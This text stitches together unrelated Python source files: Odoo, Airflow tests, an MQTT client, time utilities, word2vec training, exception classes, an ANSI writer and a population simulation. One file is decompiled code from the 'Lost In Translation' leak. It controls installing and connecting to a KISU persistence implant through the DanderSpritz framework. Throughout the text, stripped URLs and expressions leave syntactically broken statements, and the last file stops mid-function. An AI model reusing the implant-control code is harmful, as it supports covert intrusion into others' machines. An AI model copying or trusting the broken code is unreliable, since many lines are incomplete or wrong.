# Copyright 2016 Antonio Espinosa # License AGPL-3.0 or later ( from odoo import _, api, models from odoo.exceptions import ValidationError class ResPartner(models.Model): _inherit = "res.partner" @api.multi @api.constrains('ref', 'is_company', 'company_id') def _check_ref(self): for partner in self: mode = partner.company_id.partner_ref_unique if (partner.ref and ( mode == 'all' or (mode == 'companies' and partner.is_company))): domain = [ ('id', '!=',, ('ref', '=', partner.ref), ] if mode == 'companies': domain.append(('is_company', '=', True)) other = # active_test is False when called from # base.partner.merge.automatic.wizard if other and self.env.context.get("active_test", True): raise ValidationError( _("This reference is equal to partner '%s'") % other[0].display_name)
Leak #5 - Lost In Translation/windows/Resources/DeMi/PyScripts/Lib/demi/
# uncompyle6 version 2.9.10 # Python bytecode 2.7 (62211) # Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10) # [GCC 6.2.0 20161005] # Embedded file name: import import demi.registry import dsz.env import re ConnectedEnv = '_DEMI_KISU_COMMS_ESTABLISHED' KiSuEnabledEnv = '_DEMI_KISU_ENABLED' def IsConnected(): id = ConnectedId() return id != None def ConnectedId(): curId = None try: curId = int(dsz.env.Get(ConnectedEnv), 16) if curId == 0: return return curId except: return return def UseKiSu(): if not IsConnected(): return False try: state = dsz.env.Get(KiSuEnabledEnv) if state.lower() in ('true', 'enabled', 'on', '1', 'go', 'use'): return True except: pass return False def EnableKiSu(): dsz.env.Set(KiSuEnabledEnv, 'on') return True def DisableKiSu(): dsz.env.Set(KiSuEnabledEnv, 'off') return True def IsKisuAvailable(instance=None, type=None): return dsz.cmd.Run('available -command kisu_install') def InstallKiSu(instance=None, type=None): dsz.ui.Echo('entered') instanceId = '-type PC' if instance != None: instanceId = '-instance 0x%08x' % instance if type != None: instanceId = '-type %s' % type return dsz.cmd.Run('kisu_install %s' % instanceId) def ConnectKiSu(instance=None, type=None): instanceId = '-type PC' if instance != None: instanceId = '-instance %s' % instance if type != None: instanceId = '-type %s' % type return dsz.cmd.Run('kisu_connect %s' % instanceId) def DisconnectKiSu(): return dsz.cmd.Run('kisu_disconnect') def EnsureConnected(ask=True): if demi.IsConnected(): return True if not ask: dsz.ui.Echo('* Not currently connected to a KISU instance', dsz.ERROR) return False dsz.ui.Echo('* Not currently connected to a KISU instance', dsz.WARNING) try: str = dsz.ui.GetString('What KISU would you like to connect to?', 'pc') except: return False key = '-type' try: if re.match('^([0-9]+)|(0[xX][0-9a-fA-F]{1,8})$', str): key = '-instance' except: pass dsz.ui.Echo('Loading KISU tool') if not dsz.cmd.Run('available -command kisu_connect -load'): dsz.ui.Echo(' FAILED', dsz.ERROR) dsz.ui.Echo('* Unable to load KISU tool', dsz.ERROR) return False dsz.ui.Echo(' SUCCESS', dsz.GOOD) dsz.ui.Echo('Attempting to connect to KISU %s' % str) if not dsz.cmd.Run('kisu_connect %s %s' % (key, str)): dsz.ui.Echo(' FAILED', dsz.ERROR) dsz.ui.Echo('* Unable to connect to a KISU instance', dsz.ERROR) return False dsz.ui.Echo(' SUCCESS', dsz.GOOD) def TranslateIdToName(id): Unknown = 'Unknown' if id == None: return Unknown else: try: import demi.mcf.kisu.ids for name in demi.mcf.kisu.ids.nameTable: if demi.mcf.kisu.ids.nameTable[name] == id: return name except: pass return Unknown def TranslateNameToId(Name): Unknown = 0 if Name == None: return Unknown else: try: import demi.mcf.kisu.ids for kisuName in demi.mcf.kisu.ids.nameTable: if kisuName.lower() == Name.lower(): return demi.mcf.kisu.ids.nameTable[kisuName] except: pass return Unknown
# Consider if this is the correct location for this element def test_valid_coord(coord): """ Fill in """ assert type(coord) is tuple, "{} is not a tuple (coord)".format(coord) assert type(coord[0]) is int, "{} is not an int (coord 0)".format(coord[0]) assert type(coord[1]) is int, "{} is not an int (coord 1)".format(coord[1]) assert coord[0] > -1, "{} must be greater than zero (coord 0)".format(coord[0]) assert coord[1] > -1, "{} must be greater than zero (coord 1)".format(coord[1]) return True # This can probably be consolidated into an error class def coord_range(coord0, coord1): """ Returns a list of coordinates for a table (by row) between two coordinate points of the form (0,0) where the first coordinate value is less than the second in both axes @parameter - coord0, type = tuple @parameter - coord1, type = tuple @return, type = list of tuples or error @dependencies, test_valid_coord (lf) which returns true or raises an assertion error """ # _Testing if test_valid_coord(coord0) and test_valid_coord(coord1): pass else: raise TypeError("Rewrite coordinates") # consider if type error is the best error for this # _Main ret_list = [] if coord0[0] <= coord1[0] and coord0[1] <= coord1[1]: init0 = coord0[0] init1 = coord0[1] while init0 < coord1[0] + 1: while init1 < coord1[1] + 1: ret_list.append((init0,init1)) init1 += 1 init0 += 1 init1 = coord0[1] else: raise TypeError("Specify a valid start and end coordinate") return ret_list
""" Created on 16 Nov 2018 @author: Bruno Beloff ( """ from collections import OrderedDict from import JSONable # -------------------------------------------------------------------------------------------------------------------- class OPCStatus(JSONable): """ classdocs """ CHARS = 6 # ---------------------------------------------------------------------------------------------------------------- @classmethod def construct(cls, chars): if len(chars) != cls.CHARS: raise ValueError(chars) fan_on = chars[0] laser_dac_on = chars[1] fan_dac_value = chars[2] laser_dac_value = chars[3] laser_switch = chars[4] gain_toggle = chars[5] return OPCStatus(fan_on, laser_dac_on, fan_dac_value, laser_dac_value, laser_switch, gain_toggle) # ---------------------------------------------------------------------------------------------------------------- def __init__(self, fan_on, laser_dac_on, fan_dac_value, laser_dac_value, laser_switch, gain_toggle): """ Constructor """ self.__fan_on = int(fan_on) self.__laser_dac_on = int(laser_dac_on) self.__fan_dac_value = int(fan_dac_value) self.__laser_dac_value = int(laser_dac_value) self.__laser_switch = int(laser_switch) self.__gain_toggle = int(gain_toggle) # ---------------------------------------------------------------------------------------------------------------- def fan_is_on(self): return self.fan_on & 0x01 def laser_is_on(self): return self.laser_switch & 0x01 # ---------------------------------------------------------------------------------------------------------------- def as_json(self): jdict = OrderedDict() jdict['fan-on'] = self.fan_on jdict['laser-dac-on'] = self.laser_dac_on jdict['fan-dac-value'] = self.fan_dac_value jdict['laser-dac-value'] = self.laser_dac_value jdict['laser-switch'] = self.laser_switch jdict['gain-toggle'] = self.gain_toggle return jdict # ---------------------------------------------------------------------------------------------------------------- @property def fan_on(self): return self.__fan_on @property def laser_dac_on(self): return self.__laser_dac_on @property def fan_dac_value(self): return self.__fan_dac_value @property def laser_dac_value(self): return self.__laser_dac_value @property def laser_switch(self): return self.__laser_switch @property def gain_toggle(self): return self.__gain_toggle # ---------------------------------------------------------------------------------------------------------------- def __str__(self, *args, **kwargs): return "OPCStatus:{fan_on:0x%02x, laser_dac_on:0x%02x, fan_dac_value:0x%02x, laser_dac_value:0x%02x, " \ "laser_switch:0x%02x, gain_toggle:0x%02x}" % \ (self.fan_on, self.laser_dac_on, self.fan_dac_value, self.laser_dac_value, self.laser_switch, self.gain_toggle)
# Copyright 2014-2015 Predikto, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"): you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # class RequestError(Exception): def __init__(self, response, content=None, message=None): self.response = response self.content = content self.message = message def __str__(self): message = "ERROR!" if hasattr(self.response, 'status_code'): message += " HTTP Status: %s." % (self.response.status_code) if hasattr(self.response, 'message'): message += " Message: %s." % (self.response.message) if self.content is not None: message += " Error: " + str(self.content) return message class MissingConfig(Exception): pass class ClientError(RequestError): """ Base """ pass class InvalidResource(ClientError): """ 400 """ pass class Unauthorized(ClientError): """ 401 """ pass class Forbidden(ClientError): """ 403 """ pass class ResourceNotFound(ClientError): """ 404 """ pass class EntityTooLarge(ClientError): """ 413 """ pass class ServerError(RequestError): """ 500 """ pass class MethodNotAllowed(ClientError): """ 405 """ def allowed_methods(self): return self.response['Allow']
# -*- coding: utf-8 -*- # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import logging import multiprocessing import os import signal import time import unittest from datetime import datetime import psutil import six from airflow import DAG from airflow.utils import helpers from airflow.models import TaskInstance from airflow.operators.dummy_operator import DummyOperator class TestHelpers(unittest.TestCase): @staticmethod def _ignores_sigterm(child_pid, child_setup_done): def signal_handler(signum, frame): pass signal.signal(signal.SIGTERM, signal_handler) child_pid.value = os.getpid() child_setup_done.release() while True: time.sleep(1) @staticmethod def _parent_of_ignores_sigterm(parent_pid, child_pid, setup_done): def signal_handler(signum, frame): pass os.setsid() signal.signal(signal.SIGTERM, signal_handler) child_setup_done = multiprocessing.Semaphore(0) child = multiprocessing.Process(target=TestHelpers._ignores_sigterm, args=[child_pid, child_setup_done]) child.start() child_setup_done.acquire(timeout=5.0) parent_pid.value = os.getpid() setup_done.release() while True: time.sleep(1) def test_render_log_filename(self): try_number = 1 dag_id = 'test_render_log_filename_dag' task_id = 'test_render_log_filename_task' execution_date = datetime(2016, 1, 1) dag = DAG(dag_id, start_date=execution_date) task = DummyOperator(task_id=task_id, dag=dag) ti = TaskInstance(task=task, execution_date=execution_date) filename_template = "{{ ti.dag_id }}/{{ ti.task_id }}/{{ ts }}/{{ try_number }}.log" ts = ti.get_template_context()['ts'] expected_filename = "{dag_id}/{task_id}/{ts}/{try_number}.log".format(dag_id=dag_id, task_id=task_id, ts=ts, try_number=try_number) rendered_filename = helpers.render_log_filename(ti, try_number, filename_template) self.assertEqual(rendered_filename, expected_filename) def test_reap_process_group(self): """ Spin up a process that can't be killed by SIGTERM and make sure it gets killed anyway. """ parent_setup_done = multiprocessing.Semaphore(0) parent_pid = multiprocessing.Value('i', 0) child_pid = multiprocessing.Value('i', 0) args = [parent_pid, child_pid, parent_setup_done] parent = multiprocessing.Process(target=TestHelpers._parent_of_ignores_sigterm, args=args) try: parent.start() self.assertTrue(parent_setup_done.acquire(timeout=5.0)) self.assertTrue(psutil.pid_exists(parent_pid.value)) self.assertTrue(psutil.pid_exists(child_pid.value)) helpers.reap_process_group(parent_pid.value, logging.getLogger(), timeout=1) self.assertFalse(psutil.pid_exists(parent_pid.value)) self.assertFalse(psutil.pid_exists(child_pid.value)) finally: try: os.kill(parent_pid.value, signal.SIGKILL) # terminate doesnt work here os.kill(child_pid.value, signal.SIGKILL) # terminate doesnt work here except OSError: pass def test_chunks(self): with self.assertRaises(ValueError): [i for i in helpers.chunks([1, 2, 3], 0)] with self.assertRaises(ValueError): [i for i in helpers.chunks([1, 2, 3], -3)] self.assertEqual([i for i in helpers.chunks([], 5)], []) self.assertEqual([i for i in helpers.chunks([1], 1)], [[1]]) self.assertEqual([i for i in helpers.chunks([1, 2, 3], 2)], [[1, 2], [3]]) def test_reduce_in_chunks(self): self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + [y], [1, 2, 3, 4, 5], []), [[1, 2, 3, 4, 5]]) self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + [y], [1, 2, 3, 4, 5], [], 2), [[1, 2], [3, 4], [5]]) self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + y[0] * y[1], [1, 2, 3, 4], 0, 2), 14) def test_is_in(self): obj = ["list", "object"] # Check for existence of a list object within a list self.assertTrue( helpers.is_in(obj, [obj]) ) # Check that an empty list returns false self.assertFalse( helpers.is_in(obj, []) ) # Check to ensure it handles None types self.assertFalse( helpers.is_in(None, [obj]) ) # Check to ensure true will be returned of multiple objects exist self.assertTrue( helpers.is_in(obj, [obj, obj]) ) def test_is_container(self): self.assertFalse(helpers.is_container("a string is not a container")) self.assertTrue(helpers.is_container(["a", "list", "is", "a", "container"])) def test_as_tuple(self): self.assertEqual( helpers.as_tuple("a string is not a container"), ("a string is not a container",) ) self.assertEqual( helpers.as_tuple(["a", "list", "is", "a", "container"]), ("a", "list", "is", "a", "container") ) class HelpersTest(unittest.TestCase): def test_as_tuple_iter(self): test_list = ['test_str'] as_tup = helpers.as_tuple(test_list) self.assertTupleEqual(tuple(test_list), as_tup) def test_as_tuple_no_iter(self): test_str = 'test_str' as_tup = helpers.as_tuple(test_str) self.assertTupleEqual((test_str,), as_tup) def test_is_in(self): from airflow.utils import helpers # `is_in` expects an object, and a list as input test_dict = {'test': 1} test_list = ['test', 1, dict()] small_i = 3 big_i = 2 ** 31 test_str = 'test_str' test_tup = ('test', 'tuple') test_container = [test_dict, test_list, small_i, big_i, test_str, test_tup] # Test that integers are referenced as the same object self.assertTrue(helpers.is_in(small_i, test_container)) self.assertTrue(helpers.is_in(3, test_container)) # python caches small integers, so i is 3 will be True, # but `big_i is 2 ** 31` is False. self.assertTrue(helpers.is_in(big_i, test_container)) self.assertFalse(helpers.is_in(2 ** 31, test_container)) self.assertTrue(helpers.is_in(test_dict, test_container)) self.assertFalse(helpers.is_in({'test': 1}, test_container)) self.assertTrue(helpers.is_in(test_list, test_container)) self.assertFalse(helpers.is_in(['test', 1, dict()], test_container)) self.assertTrue(helpers.is_in(test_str, test_container)) self.assertTrue(helpers.is_in('test_str', test_container)) bad_str = 'test_' bad_str += 'str' self.assertFalse(helpers.is_in(bad_str, test_container)) self.assertTrue(helpers.is_in(test_tup, test_container)) self.assertFalse(helpers.is_in(('test', 'tuple'), test_container)) bad_tup = ('test', 'tuple', 'hello') self.assertFalse(helpers.is_in(bad_tup[:2], test_container)) def test_is_container(self): self.assertTrue(helpers.is_container(['test_list'])) self.assertFalse(helpers.is_container('test_str_not_iterable')) # Pass an object that is not iter nor a string. self.assertFalse(helpers.is_container(10)) def test_cross_downstream(self): """Test if all dependencies between tasks are all set correctly.""" dag = DAG(dag_id="test_dag", start_tasks = [DummyOperator(task_id="t{i}".format(i=i), dag=dag) for i in range(1, 4)] end_tasks = [DummyOperator(task_id="t{i}".format(i=i), dag=dag) for i in range(4, 7)] helpers.cross_downstream(from_tasks=start_tasks, to_tasks=end_tasks) for start_task in start_tasks: six.assertCountEqual(self, start_task.get_direct_relatives(upstream=False), end_tasks) if __name__ == '__main__': unittest.main()
### Taken from ### Requires Paho-MQTT package, install by: ### pip install paho-mqtt import paho.mqtt.client as mqtt MQTT_URL = "" MQTT_USERID = "" MQTT_PASSWD = "" MQTT_TOPIC_EVENT = '' MQTT_TOPIC_PUB = '' MQTT_PUB_STRING = '' def on_connect(client, userdata, flags, rc): print("Connected with result code " + str(rc)) if MQTT_TOPIC_EVENT: client.subscribe(MQTT_TOPIC_EVENT) print("Subscribed to " + MQTT_TOPIC_EVENT) if MQTT_PUB_STRING: client.publish(MQTT_TOPIC_PUB, MQTT_PUB_STRING, 0) print("Published " + MQTT_PUB_STRING + " to " + MQTT_TOPIC_PUB) # The callback for when a PUBLISH message is received from the server. def on_message(client, userdata, msg): print(msg.topic + " " + str(msg.payload)) client = mqtt.Client() client.on_connect = on_connect client.on_message = on_message print("connecting to " + MQTT_URL) client.username_pw_set(MQTT_USERID, MQTT_PASSWD) client.connect(MQTT_URL, 1883, 60) client.loop_forever()
# -*- coding: utf-8 -*- """ 时间处理模块,统一处理时间相关函数 @author: AZLisme @email: """ from datetime import datetime, timedelta import pytz import time _DEFAULT_TIMEZONE = pytz.utc def now(tz=None): """获取现在的日期对象(带时区)""" if tz is None: return else: return def get_timezone(tz_name: str): """获取时区对象,封装pytz :param tz_name: 时区名字,常用的有'UTC', 'Asia/Shanghai' :return: """ return pytz.timezone(tz_name) def get_default_timezone(): """获取默认时间戳 :return: """ return _DEFAULT_TIMEZONE def set_default_timezone(tz_name: str) -> None: """设置默认的时区 :param Union(str, unicode) tz_name: 时区名字, 例如 'UTC', 'Asia/Shanghai' :return: None """ global _DEFAULT_TIMEZONE _DEFAULT_TIMEZONE = pytz.timezone(tz_name) def timestamp(dt: datetime = None) -> float: """获取时间戳, 如果参数为None则返回当前时间戳 :param dt: 要转化为时间戳的时间,如果为None则返回当前时间戳。 :return float: 时间戳 """ if dt is None: return time.time() else: if dt.tzinfo is None: dt = _DEFAULT_TIMEZONE.localize(dt) utc_dt = dt.astimezone(pytz.utc) delta = utc_dt - datetime(1970, 1, 1, 0, 0 ,0, 0, pytz.utc) return delta.total_seconds() def datetime_from_timestamp(ts: float) -> datetime: """ 从时间戳获取日期对象 :param ts: 时间戳 :return: 日期对象 """ dt = datetime(1970, 1, 1, 0, 0 ,0, 0, pytz.utc) + timedelta(seconds=ts) return dt.astimezone(_DEFAULT_TIMEZONE)
# -*- coding: utf-8 -*- import gensim import jieba import pandas as pd from tqdm import tqdm from datetime import datetime class yjiang(object): def __init__(self): self.idx2id = None self.raw_sentence = None self.preprocess_sentence = None self.vecs = None self.alternative_words = set() def load_raw(self, file_path): data = pd.read_csv(file_path) self.idx2id = data["productid"].to_dict() self.raw_sentence = data[u"commentcontent"].map(str).tolist() def preprocess(self): cut_sentence = [list(jieba.cut(s)) for s in tqdm(self.raw_sentence)] self.preprocess_sentence = cut_sentence # 可能这里还需要去掉停用词 def train_wordvec(self, param="default"): if param == "default": param = { "size": 100, # Word vector dimensionality "min_count": 5, # Minimum word count "workers": 4, # Number of threads to run in parallel "window": 10, # Context window size "sample": 1e-3 # Downsample setting for frequent words } print "\n{} Training wordvector ...".format( model = gensim.models.Word2Vec(self.preprocess_sentence, seed=1, **param) model.init_sims(replace=True) print "\n{} Saving wordvector ...".format("{}features_{}mincount_{}windowsize".format(param["size"], param["min_count"], param["window"])) def load_wordvec(self, filename, test=False): self.vecs = gensim.models.Word2Vec.load(filename) if test: print self.vecs.most_similar(u"不错") print "Successfully!" def find_alternative_words(self, threshold=0.9, k=5): print "{} Finding alternative words ...".format( for w in tqdm(self.vecs.vocab): t = self.vecs.similar_by_vector(w, N) i = 0 while i < k: if t[i][1] >= threshold: self.alternative_words.add((w, t[i][0]) if w > t[i][0] else (t[i][0], w)) else: break i += 1 def run(self, file_path): self.load_raw(file_path) self.preprocess() self.train_wordvec() self.load_wordvec('100features_5mincount_10windowsize') self.find_alternative_words() print "\n", self.alternative_words.__len__() if __name__ == "__main__": tt = yjiang()"text.csv")
#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of truck # <truck - test-friendly event bus layer on top of django signals> # Copyright (C) <2012> Gabriel Falcão <> # Copyright (C) <2012> Yipit Inc. <> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <>. from mock import patch, call from truck.core import Loader @patch('truck.core.importlib') @patch('truck.core.imp') def test_loader_should_be_able_to_load_a_single_module(imp, importlib): u"Loader should be able to load a listener from a module" importlib.import_module.return_value.__path__ = '/some/path' Loader.import_listener_from_module('deal') imp.find_module.assert_called_once_with('listeners', '/some/path') importlib.import_module.assert_has_calls([ call('deal'), call('deal.listeners'), ]) @patch('truck.core.importlib') @patch('truck.core.imp') def test_loader_should_ignore_if_there_is_no_such_app(imp, importlib): "Loader should ignore when the app does not exist" importlib.import_module.side_effect = ( AttributeError('there is no such module')) Loader.import_listener_from_module('deal') importlib.import_module.assert_called_once_with('deal') assert not imp.find_module.called @patch('truck.core.importlib') @patch('truck.core.imp') def test_loader_should_ignore_if_there_are_no_listeners(imp, importlib): "Loader should ignore when the app does not exist" importlib.import_module.return_value.__path__ = '/some/path' imp.find_module.side_effect = ImportError('LOL') Loader.import_listener_from_module('deal') importlib.import_module.assert_called_once_with('deal') imp.find_module.assert_called_once_with('listeners', '/some/path') @patch.object(Loader, 'import_listener_from_module') @patch('truck.core.settings') def test_loader_start_maps_installed_apps( settings, import_listener_from_module): "Loader.start() should ignore when the app does not exist" settings.INSTALLED_APPS = ['chuck', 'norris'] Loader.start() import_listener_from_module.assert_has_calls([ call('chuck'), call('norris'), ])
#!/usr/bin/env python3 """Module providing an AnsiParseTreeWriter for formatted printing of ptTools.ParseTreeNodes to an output channel on linux systems.""" __all__ = [ 'BLINK', 'BOLD', 'COLOR', 'COLORS', 'COMMENT', 'PRECEDENCE', 'UNDERLINE', 'AnsiParseTreeWriter', ] from . verbosewriter import VerboseParseTreeWriter BLINK = 'blink' BOLD = 'bold' COLOR = 'color' COLORS = 'colors' COMMENT = 'comment' PRECEDENCE = 'precedence' UNDERLINE = 'underline' class AnsiParseTreeWriter(VerboseParseTreeWriter): """Writer for printing attributed ptTools.ParseTreeNodes to an output channel on linux systems. Note that the ansi markup sequence behaves differently from e.g. html. A closing markup closes all opened markups. However, opening sequences CAN be nested, but are all closed when encountering the closing sequence. The current style description is updated while traversing non-terminal nodes, but not written until reaching a terminal. Every token is embraced in its own opening and closing markup sequence. """ ## ANSI print sequence: ## {ESC}[{ATTR};{BG};{256colors};{FG}m ## e.g.: "\033[38;5;255mfoobar\033[39m" _ansi_constants = {'ESC': '\033', 'BG': '5', 'FG': '0',} def __init__(self, out): """Initialized with an output channel.""" super().__init__(out) self._style = {} """The currently queued style dictionary.""" def _ansi_dict_from(self, style): """Converts style dictionary to ansi description dictionary.""" ## Order of attributest IS significant! attr = '38' if style.get(BLINK): attr = '5;' + attr if style.get(UNDERLINE): attr = '4;' + attr if style.get(BOLD): attr = '1;' + attr ansidict = {'ATTR': attr, 'CLR' : style.get(COLOR,'')} ansidict.update(self._ansi_constants) return ansidict def _get_node_style(self, node): """Retrieves all inherited attributes of node and merges them to one style dictionary. Called from super.write_node(node). """ return node.all_attributes def _get_token_style(self, tok): """Retrieves all attributes of token and returns style dictionary. Called from super.write_token(token). """ return tok.attributes def _write_closing_markup(self, style=None): """Writes ansi style closing sequence to self.out, and clears queued style information.""" self._write_closing_markup_raw(self._style) self._style = {} def _write_closing_markup_raw(self, style): """Writes ansi style closing sequence to self.out without altering the queued style description.""" if style: self._write_str("{ESC}[{FG}m".format(**self._ansi_constants)) def _write_leaf(self, node): """Writes terminal node with its tokens.""" if not node.tokens: return else: ## Tokens except the last token in terminalnode.tokens ## define their markup themselves, whereas the last token ## receives its node's markups. for tok in node.tokens[:-1]: token_style = self._get_token_style(tok) self._write_opening_markup_raw(token_style) super()._write_token(tok) self._write_closing_markup_raw(token_style) self._write_token(node.token) ## (last token). def _write_opening_markup(self, style): """Queues style dictionary for output. This method reimplements its superclass method. Called for each node with the intention to write opening markups to self.out. Here, we only queue the style information as we may have to insert tokens with different markups, before. """ if style: self._style.update(style) def _write_opening_markup_raw(self, style): """Writes opening sequence as described by ansi_dict to self.out, without altering the queued style description.""" if style: ansi_dict = self._ansi_dict_from(style) self._write_str('{ESC}[{ATTR};{BG};{CLR}m'.format(**ansi_dict)) def _write_indent(self, tok): """Calls super. TODO - Suspend markup (to avoid preceeding underlines in multiline comments.). """ super()._write_indent(tok) def _write_spacing(self, tok): """Calls super. TODO - Suspend markup (to avoid preceeding underlines in multiline comments.). """ super()._write_spacing(tok) def _write_token(self, tok): """Writes token and markups to self.out.""" self._write_opening_markup_raw(self._style) super()._write_token(tok) self._write_closing_markup_raw(self._style)
''' MIT License Copyright (c) 2017 grokkers Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ''' class NotResponding(Exception): def __init__(self): self.code = 504 self.error = 'API request timed out, please be patient.' super().__init__(self.error) class RequestError(Exception): '''Base class for request errors''' def __init__(self, resp, data): self.response = resp self.code = resp.status self.method = resp.method self.reason = resp.reason self.error = data.get('error') if 'message' in data: self.error = data.get('message') self.fmt = '{0.reason} ({0.code}): {0.error}'.format(self) super().__init__(self.fmt) class NotFoundError(RequestError): '''Raised if the player/clan is not found.''' pass class ServerError(RequestError): '''Raised if the api service is having issues''' pass
from __future__ import division from random import shuffle, choice, randint, seed from os.path import expanduser from numpy import log10 from scipy import stats import numpy as np import time import math import copy import sys import os from pprint import pprint as pp mydir = expanduser("~/") sys.path.append(mydir + "GitHub/Emergence-Senescence/model") GenPath = mydir + "GitHub/Emergence-Senescence/results/simulated_data/" col_headers = 'sim,r,gr,mt,q,rls_min,rls_max,grcv,mtcv,rlscv,ct,rlsmean,rlsvar,total.abundance,species.richness' OUT = open("/gpfs/home/r/z/rzmogerr/Carbonate/SSTOSIMPLE.csv", 'w+') print>>OUT, col_headers OUT.close() senesce_simple = lambda age, rls: (1-(age/(rls+0.01))) #senesce_simple = lambda age, rls: 1 tradeoff_reverse_logistic = lambda rls: 2 / (2 + math.exp((0.2*rls)-8))#in the full implementation, don't enforce these parameters #tradeoff_reverse_logistic = lambda rls: 2 / (2 + math.exp((0.2*rls)-4)) #tradeoff_reverse_logistic = lambda rls: rls/rls g0delay = lambda rls: 1 / (1 + (rls/100)) #competitive_growth = lambda age: def output(iD, sD, rD, sim, ct, r): IndIDs, SpIDs = [], [] for k, v in iD.items(): IndIDs.append(k) SpIDs.append(v['sp']) #pp(IndIDs) #pp(SpIDs) N = len(IndIDs) R = len(rD.items()) S = len(list(set(SpIDs))) #RLSL=[] #for i in IndIDs: # RLSL.append(iD[i]['rls']) RLSL=[iD[i]['rls'] for i in IndIDs] rlsmean = np.mean(RLSL) rlsvar = np.var(RLSL) if N > 0: #OUT = open(GenPath + 'SimData.csv', 'a') OUT=open("/gpfs/home/r/z/rzmogerr/Carbonate/SSTOSIMPLE.csv","a") outlist = [sim, r, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, ct, rlsmean, rlsvar, N, S] outlist = str(outlist).strip('[]') outlist = outlist.replace(" ", "") print>>OUT, outlist OUT.close() try: print 'sim:', '%3s' % sim, 'ct:', '%3s' % ct,' N:', '%4s' % N, ' S:', '%4s' % S, ' R:', '%4s' % R, 'LSm:' '%1s' % rlsmean, 'LSv:' '%2s' % rlsvar except UnboundLocalError: print 'ERROR: N=0' return def immigration(sD, iD, ps, sd=1): r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps for j in range(sd): if sd == 1 and np.random.binomial(1, u) == 0: continue p = np.random.randint(1, 1000) if p not in sD: sD[p] = {'gr' : 10**np.random.uniform(gr, 0)} sD[p]['mt'] = 10**np.random.uniform(mt, 0) sD[p]['rls'] = 50#randint(rls_min,rls_max) sD[p]['grcv']=10**np.random.uniform(-6.01,grcv) sD[p]['mtcv']=10**np.random.uniform(-6.01,mtcv) sD[p]['rlscv']=.15#10**np.random.uniform(-6.01,rlscv) sD[p]['efcv']=10**np.random.uniform(-6.01,efcv) es = np.random.uniform(1, 100, 3) sD[p]['ef'] = es/sum(es) sD[p]['a']=a ID = time.time() iD[ID] = copy.copy(sD[p]) iD[ID]['sp'] = p iD[ID]['age']=np.random.geometric(.5)-1 #iD[ID]['age']=0#doesn't need to start with age==0... iD[ID]['x'] = 0 iD[ID]['y'] = 0 iD[ID]['rls']=sD[p]['rls']; iD[ID]['mt']=sD[p]['mt']; iD[ID]['ef']=sD[p]['ef'];iD[ID]['gr']=sD[p]['gr'];iD[ID]['a']=sD[p]['a'] iD[ID]['q'] = 10**np.random.uniform(0, q) return [sD, iD] def consume(iD, rD, ps): r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps keys = list(iD) shuffle(keys) for k in keys: if len(list(rD)) == 0: return [iD, rD] c = choice(list(rD)) e = iD[k]['ef'][rD[c]['t']] * iD[k]['q']#why does this dep on the indiv's q? #pp(iD[k]['ef'][rD[c]['t']]) #pp(e) #To account for the Frenk et al. 2017, one idea that you had was to make the indiv a generalist by taking a max of #iD[k]['ef'][rD[c]['t']] and another number (e.g., (1/3)) #but it would be better to do some distrn that has age as a param, so that it is generalizable and can be randomized. iD[k]['q'] += min([rD[c]['v'], e]) rD[c]['v'] -= min([rD[c]['v'], e]) if rD[c]['v'] <= 0: del rD[c] return [iD, rD] def grow(iD): for k, v in iD.items(): m = v['mt'] iD[k]['q'] -= v['gr'] * (v['q']) if v['age']==0 and v['q'] < m/(0.5+v['a'])*(0.5-v['a']):#daughters are born in G0 phase,we know that #theyre smaller in G0. We don't want to kill them all because of it, though del iD[k] elif v['q'] < m: del iD[k] return iD def maintenance(iD):#mt is less for juveniles for k, v in iD.items(): if v['age']==0: iD[k]['q'] -= v['mt']/(0.5+v['a'])*(0.5-v['a']) if v['q'] < v['mt']/(0.5+v['a'])*(0.5-v['a']): del iD[k] else: iD[k]['q'] -= v['mt'] if v['q'] < v['mt']: del iD[k] return iD def reproduce(sD, iD, ps, p = 0): for k, v in iD.items(): if v['gr'] > 1 or v['gr'] < 0: del iD[k] elif v['q'] > v['mt']/(0.5+v['a']) and np.random.binomial(1, v['gr']) == 1: if v['age'] >= v['rls'] or v['mt']<0: del iD[k] 